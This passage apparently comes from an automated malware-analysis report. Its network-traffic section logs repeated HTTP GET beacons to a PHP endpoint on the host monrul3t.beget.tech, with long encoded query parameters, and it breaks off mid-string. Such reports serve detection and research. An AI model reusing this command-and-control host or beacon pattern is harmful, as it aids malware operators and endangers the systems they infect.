ZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaRRVT2smaNZTVE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNTSU1UbCpWSzl0UKhXSp9UaR1mT0k1RNlmWU1UaGdVW4V1VNVTVqllaWdlT5V1RPdXQU1kMVpnTqZ1RNhmUUlVNJ1WWtplaJNXSTpENrpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrR1Tp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUeNp2T5VlaPlXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dFp2TxkkaPhXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZFpmTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dRp2Tz0kaPlXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZBpmTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFD